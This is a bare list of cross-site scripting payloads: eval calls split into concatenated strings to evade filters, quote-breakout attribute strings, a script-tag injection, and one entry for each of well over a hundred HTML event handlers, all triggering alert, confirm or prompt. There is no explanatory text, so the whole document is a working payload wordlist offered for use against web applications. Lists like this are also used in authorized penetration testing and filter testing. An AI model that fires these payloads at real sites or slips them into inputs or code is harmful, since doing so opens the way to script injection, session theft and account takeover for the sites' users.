eval("a"+"l"+"e"+"r"+"t"+"(1)")
eval("c"+"onfirm(1)")
eval("prom"+"pt(1)")
" onload="alert(1)"
" onclick="alert(1)" "
' onmouseover="confirm(1)" '
"> <script>prompt(1)</script> <"
' onfocus="alert(1)" autofocus '
"onload="confirm(1)"
" onafterprint="prompt(1)"
" onafterscriptexecute="prompt(1)"
" onanimationcancel="prompt(1)"
" onanimationend="prompt(1)"
" onanimationiteration="prompt(1)"
" onanimationstart="prompt(1)"
" onauxclick="prompt(1)"
" onbeforecopy="prompt(1)"
" onbeforecut="prompt(1)"
" onbeforeinput="prompt(1)"
" onbeforepaste="prompt(1)"
" onbeforeprint="prompt(1)"
" onbeforescriptexecute="prompt(1)"
" onbeforetoggle="prompt(1)"
" onbeforeunload="prompt(1)"
" onbegin="prompt(1)"
" onblur="prompt(1)"
" oncancel="prompt(1)"
" oncanplay="prompt(1)"
" oncanplaythrough="prompt(1)"
" onchange="prompt(1)"
" onclick="prompt(1)"
" onclose="prompt(1)"
" oncommand="prompt(1)"
" oncontentvisibilityautostatechange="prompt(1)"
" oncontentvisibilityautostatechange(hidden)="prompt(1)"
" oncontextmenu="prompt(1)"
" oncopy="prompt(1)"
" oncuechange="prompt(1)"
" oncut="prompt(1)"
" ondblclick="prompt(1)"
" ondrag="prompt(1)"
" ondragend="prompt(1)"
" ondragenter="prompt(1)"
" ondragexit="prompt(1)"
" ondragleave="prompt(1)"
" ondragover="prompt(1)"
" ondragstart="prompt(1)"
" ondrop="prompt(1)"
" ondurationchange="prompt(1)"
" onend="prompt(1)"
" onended="prompt(1)"
" onerror="prompt(1)"
" onfocus="prompt(1)"
" onfocus(autofocus)="prompt(1)"
" onfocusin="prompt(1)"
" onfocusout="prompt(1)"
" onformdata="prompt(1)"
" onfullscreenchange="prompt(1)"
" ongesturechange="prompt(1)"
" ongestureend="prompt(1)"
" ongesturestart="prompt(1)"
" onhashchange="prompt(1)"
" oninput="prompt(1)"
" oninvalid="prompt(1)"
" onkeydown="prompt(1)"
" onkeypress="prompt(1)"
" onkeyup="prompt(1)"
" onload="prompt(1)"
" onloadeddata="prompt(1)"
" onloadedmetadata="prompt(1)"
" onloadstart="prompt(1)"
" onmessage="prompt(1)"
" onmousedown="prompt(1)"
" onmouseenter="prompt(1)"
" onmouseleave="prompt(1)"
" onmousemove="prompt(1)"
" onmouseout="prompt(1)"
" onmouseover="prompt(1)"
" onmouseup="prompt(1)"
" onmousewheel="prompt(1)"
" onmozfullscreenchange="prompt(1)"
" onpagehide="prompt(1)"
" onpagereveal="prompt(1)"
" onpageshow="prompt(1)"
" onpageswap="prompt(1)"
" onpaste="prompt(1)"
" onpause="prompt(1)"
" onplay="prompt(1)"
" onplaying="prompt(1)"
" onpointercancel="prompt(1)"
" onpointerdown="prompt(1)"
" onpointerenter="prompt(1)"
" onpointerleave="prompt(1)"
" onpointermove="prompt(1)"
" onpointerout="prompt(1)"
" onpointerover="prompt(1)"
" onpointerrawupdate="prompt(1)"
" onpointerup="prompt(1)"
" onpopstate="prompt(1)"
" onprogress="prompt(1)"
" onratechange="prompt(1)"
" onrepeat="prompt(1)"
" onreset="prompt(1)"
" onresize="prompt(1)"
" onscroll="prompt(1)"
" onscrollend="prompt(1)"
" onscrollsnapchange="prompt(1)"
" onscrollsnapchanging="prompt(1)"
" onsearch="prompt(1)"
" onsecuritypolicyviolation="prompt(1)"
" onseeked="prompt(1)"
" onseeking="prompt(1)"
" onselect="prompt(1)"
" onselectionchange="prompt(1)"
" onselectstart="prompt(1)"
" onshow="prompt(1)"
" onsubmit="prompt(1)"
" onsuspend="prompt(1)"
" ontimeupdate="prompt(1)"
" ontoggle="prompt(1)"
" ontoggle(popover)="prompt(1)"
" ontouchcancel="prompt(1)"
" ontouchend="prompt(1)"
" ontouchmove="prompt(1)"
" ontouchstart="prompt(1)"
" ontransitioncancel="prompt(1)"
" ontransitionend="prompt(1)"
" ontransitionrun="prompt(1)"
" ontransitionstart="prompt(1)"
" onunhandledrejection="prompt(1)"
" onunload="prompt(1)"
" onvolumechange="prompt(1)"
" onwaiting="prompt(1)"
" onwaiting(loop)="prompt(1)"
" onwebkitanimationend="prompt(1)"
" onwebkitanimationiteration="prompt(1)"
" onwebkitanimationstart="prompt(1)"
" onwebkitfullscreenchange="prompt(1)"
" onwebkitmouseforcechanged="prompt(1)"
" onwebkitmouseforcedown="prompt(1)"
" onwebkitmouseforceup="prompt(1)"
" onwebkitmouseforcewillbegin="prompt(1)"
" onwebkitplaybacktargetavailabilitychanged="prompt(1)"
" onwebkitpresentationmodechanged="prompt(1)"
" onwebkittransitionend="prompt(1)"
" onwebkitwillrevealbottom="prompt(1)"
" onwheel="prompt(1)"